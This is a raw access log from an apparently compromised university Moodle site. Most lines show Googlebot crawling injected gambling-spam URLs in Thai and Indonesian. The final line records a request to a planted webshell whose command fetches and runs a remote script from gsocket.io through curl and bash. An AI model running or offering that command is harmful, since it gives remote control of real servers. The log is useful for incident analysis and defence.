66.249.66.17 - - [14/Apr/2025:13:18:02 +0300] "GET /plugins/?gacor=boswin77-alternatif HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:19:59 +0300] "GET /plugins/?gacor=tiktak8togel HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:19:59 +0300] "GET /plugins/?gacor=55-game-app HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:20:00 +0300] "GET /site/?pg=%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%81%E0%B8%81%E0%B8%A3%E0%B8%A1%E0%B8%AA%E0%B9%81%E0%B8%81%E0%B8%99%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95 HTTP/1.1" 200 73641 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.206 - - [14/Apr/2025:12:42:04 +0300] "GET /course/view.php?id=589 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
82.23.183.22 - - [14/Apr/2025:12:44:47 +0300] "GET / HTTP/1.1" 500 0 "http://distance.gluk.ac.ke/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
114.119.154.135 - - [14/Apr/2025:12:56:02 +0300] "GET /course/view.php?id=602 HTTP/1.1" 303 754 "https://distance.gluk.ac.ke/course/index.php?categoryid=286" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.135 - - [14/Apr/2025:12:56:13 +0300] "GET /login/index.php HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/course/index.php?categoryid=286" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.135 - - [14/Apr/2025:12:58:59 +0300] "GET /course/view.php?id=485 HTTP/1.1" 303 754 "https://distance.gluk.ac.ke/course/index.php?categoryid=215" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.4 - - [14/Apr/2025:13:05:08 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [14/Apr/2025:13:13:06 +0300] "GET /course/view.php?id=579 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [14/Apr/2025:13:16:46 +0300] "GET /course/view.php?id=509 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:19:44 +0300] "GET /site/?pg=%E0%B9%80%E0%B8%8A%E0%B9%87%E0%B8%84%E0%B8%AB%E0%B8%A7%E0%B8%A2+16+%E0%B8%A1%E0%B8%81%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%A1 HTTP/1.1" 200 73569 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:20:43 +0300] "GET /plugins/?gacor=bolagila-rtp HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:20:49 +0300] "GET /plugins/?gacor=kapten89-slot HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:20:52 +0300] "GET /plugins/?gacor=btc4d HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:21:10 +0300] "GET /plugins/?gacor=sakti123-live-chat HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:21:16 +0300] "GET /plugins/?gacor=siokambing5 HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:20:00 +0300] "GET /site/?pg=z8%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95 HTTP/1.1" 200 73433 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:21:31 +0300] "GET /site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95123faz HTTP/1.1" 200 73472 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:22:10 +0300] "GET /site/?pg=%E0%B9%81%E0%B8%99%E0%B8%A7%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%A2 HTTP/1.1" 200 73466 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:53 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=Fiwfan888+%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%95%E0%B8%A3%E0%B8%87+pg" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:54 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=Fiwfan888+%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%95%E0%B8%A3%E0%B8%87+pg" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:55 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=Fiwfan888+%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%95%E0%B8%A3%E0%B8%87+pg" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:24:23 +0300] "GET /site/?pg=Bkvip+Slot HTTP/1.1" 200 73479 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:24:50 +0300] "GET /site/?pg=Bozz777 HTTP/1.1" 200 73392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:25:29 +0300] "GET /site/?pg=%E0%B8%AB%E0%B8%A7%E0%B8%A2+%E0%B9%97+%E0%B9%80%E0%B8%8B%E0%B8%B5%E0%B8%A2%E0%B8%99 HTTP/1.1" 200 73496 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:25:42 +0300] "GET /site/?pg=%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AB%E0%B8%A7%E0%B8%A2%E0%B9%84%E0%B8%97%E0%B8%A2%E0%B8%A3%E0%B8%B1%E0%B8%90+16+12+66 HTTP/1.1" 200 73504 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:26:20 +0300] "GET /site/?pg=Ufamon HTTP/1.1" 200 73415 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:22:22 +0300] "GET /plugins/?gacor=xuxu4d-togel HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:22:42 +0300] "GET /plugins/?gacor=permainan-spin HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:23:10 +0300] "GET /site/?pg=%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%94%E0%B8%B4%E0%B8%95%E0%B8%9F%E0%B8%A3%E0%B8%B5+%E0%B8%A2%E0%B8%B7%E0%B8%99%E0%B8%A2%E0%B8%B1%E0%B8%99%E0%B9%80%E0%B8%9A%E0%B8%AD%E0%B8%A3%E0%B9%8C+otp HTTP/1.1" 200 73637 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:23:19 +0300] "GET /site/?pg=%E0%B9%81%E0%B8%AD%E0%B8%94%E0%B8%AA%E0%B8%81%E0%B8%AD%E0%B8%A3%E0%B9%8C HTTP/1.1" 200 73528 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:44 +0300] "GET /site/?pg=lavaslot HTTP/1.1" 200 73475 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:46 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B9%81%E0%B8%AD%E0%B8%94%E0%B8%AA%E0%B8%81%E0%B8%AD%E0%B8%A3%E0%B9%8C" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:23:47 +0300] "GET /site/?pg=Fiwfan888+%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%95%E0%B8%A3%E0%B8%87+pg HTTP/1.1" 200 73532 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:24:39 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=lavaslot" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:25:48 +0300] "GET /site/?pg=%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B8%9E%E0%B8%99%E0%B8%B1%E0%B8%99%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B9%82%E0%B8%AD%E0%B8%99%E0%B9%80%E0%B8%87%E0%B8%B4%E0%B8%99%E0%B9%83%E0%B8%AB%E0%B9%89 HTTP/1.1" 200 73670 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:26:30 +0300] "GET /plugins/?gacor=maling-masuk-rumah-togel HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:27:26 +0300] "GET /site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%959999%2Bus HTTP/1.1" 200 73481 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:26:20 +0300] "GET /site/?pg=%E0%B8%A5%E0%B8%B4%E0%B8%87%E0%B8%84%E0%B9%8C%E0%B8%96%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%97%E0%B8%AD%E0%B8%94%E0%B8%AA%E0%B8%94%E0%B8%A7%E0%B8%AD%E0%B8%A5%E0%B9%80%E0%B8%A5%E0%B8%A2%E0%B9%8C%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%99%E0%B8%B5%E0%B9%89 HTTP/1.1" 200 73624 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.199 - - [14/Apr/2025:13:27:30 +0300] "GET /course/view.php?id=513 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:27:43 +0300] "GET /site/?pg=%E0%B9%80%E0%B8%81%E0%B8%A1%E0%B8%AD%E0%B8%AD%E0%B8%9F%E0%B9%84%E0%B8%A5%E0%B8%99%E0%B9%8C+pc+%E0%B8%AA%E0%B9%80%E0%B8%9B%E0%B8%84%E0%B8%95%E0%B9%88%E0%B9%8D%E0%B8%B2+%E0%B8%9F%E0%B8%A3%E0%B8%B5 HTTP/1.1" 200 73802 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:28:05 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B9%80%E0%B8%81%E0%B8%A1%E0%B8%AD%E0%B8%AD%E0%B8%9F%E0%B9%84%E0%B8%A5%E0%B8%99%E0%B9%8C+pc+%E0%B8%AA%E0%B9%80%E0%B8%9B%E0%B8%84%E0%B8%95%E0%B9%88%E0%B9%8D%E0%B8%B2+%E0%B8%9F%E0%B8%A3%E0%B8%B5" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:30:33 +0300] "GET /site/?pg=Proskill88 HTTP/1.1" 200 73479 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:31:23 +0300] "GET /site/?pg=%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%9B%E0%B8%B2+vs+%E0%B8%84%E0%B8%AD%E0%B8%99%E0%B8%8B%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A5+%E0%B8%8B%E0%B8%B1%E0%B8%9B%E0%B9%82%E0%B8%9B%E0%B9%82%E0%B8%A3 HTTP/1.1" 200 73710 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:31:35 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AA%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B9%81%E0%B8%9A%E0%B9%88%E0%B8%87%E0%B8%A3%E0%B8%B1%E0%B8%90%E0%B8%9A%E0%B8%B2%E0%B8%A5+16%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:31:41 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AA%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B9%81%E0%B8%9A%E0%B9%88%E0%B8%87%E0%B8%A3%E0%B8%B1%E0%B8%90%E0%B8%9A%E0%B8%B2%E0%B8%A5+16%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
102.212.236.130 - - [14/Apr/2025:13:32:49 +0300] "GET / HTTP/1.1" 500 0 "https://www.gluk.ac.ke/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68"
66.249.66.18 - - [14/Apr/2025:13:27:29 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%959999%2Bus" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:27:44 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%959999%2Bus" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:27:52 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B9%80%E0%B8%81%E0%B8%A1%E0%B8%AD%E0%B8%AD%E0%B8%9F%E0%B9%84%E0%B8%A5%E0%B8%99%E0%B9%8C+pc+%E0%B8%AA%E0%B9%80%E0%B8%9B%E0%B8%84%E0%B8%95%E0%B9%88%E0%B9%8D%E0%B8%B2+%E0%B8%9F%E0%B8%A3%E0%B8%B5" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:28:58 +0300] "GET /plugins/?gacor=link-bento123 HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:30:52 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=Proskill88" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:31:05 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=Proskill88" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.5 - - [14/Apr/2025:13:31:07 +0300] "GET /course/view.php?id=556 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:31:22 +0300] "GET /site/?pg=%E0%B8%95%E0%B8%A3%E0%B8%A7%E0%B8%88%E0%B8%AA%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%81%E0%B8%B4%E0%B8%99%E0%B9%81%E0%B8%9A%E0%B9%88%E0%B8%87%E0%B8%A3%E0%B8%B1%E0%B8%90%E0%B8%9A%E0%B8%B2%E0%B8%A5+16%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1 HTTP/1.1" 200 73645 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:32:39 +0300] "GET /site/?pg=%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%99%2B%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95%2Bpg%2B%E0%B8%9F%E0%B8%A3%E0%B8%B5 HTTP/1.1" 200 73588 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.12 - - [14/Apr/2025:13:33:06 +0300] "GET /course/view.php?id=590 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:33:32 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%99%2B%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95%2Bpg%2B%E0%B8%9F%E0%B8%A3%E0%B8%B5" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:13:33:21 +0300] "GET /site/?pg=%E0%B8%9D%E0%B8%A3%E0%B8%B1%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%A8%E0%B8%AA+vs+%E0%B8%A2%E0%B8%B4%E0%B8%9A%E0%B8%A3%E0%B8%AD%E0%B8%A5%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B9%8C HTTP/1.1" 200 73635 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:33:29 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%99%2B%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95%2Bpg%2B%E0%B8%9F%E0%B8%A3%E0%B8%B5" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:34:39 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "python-requests/2.32.3"
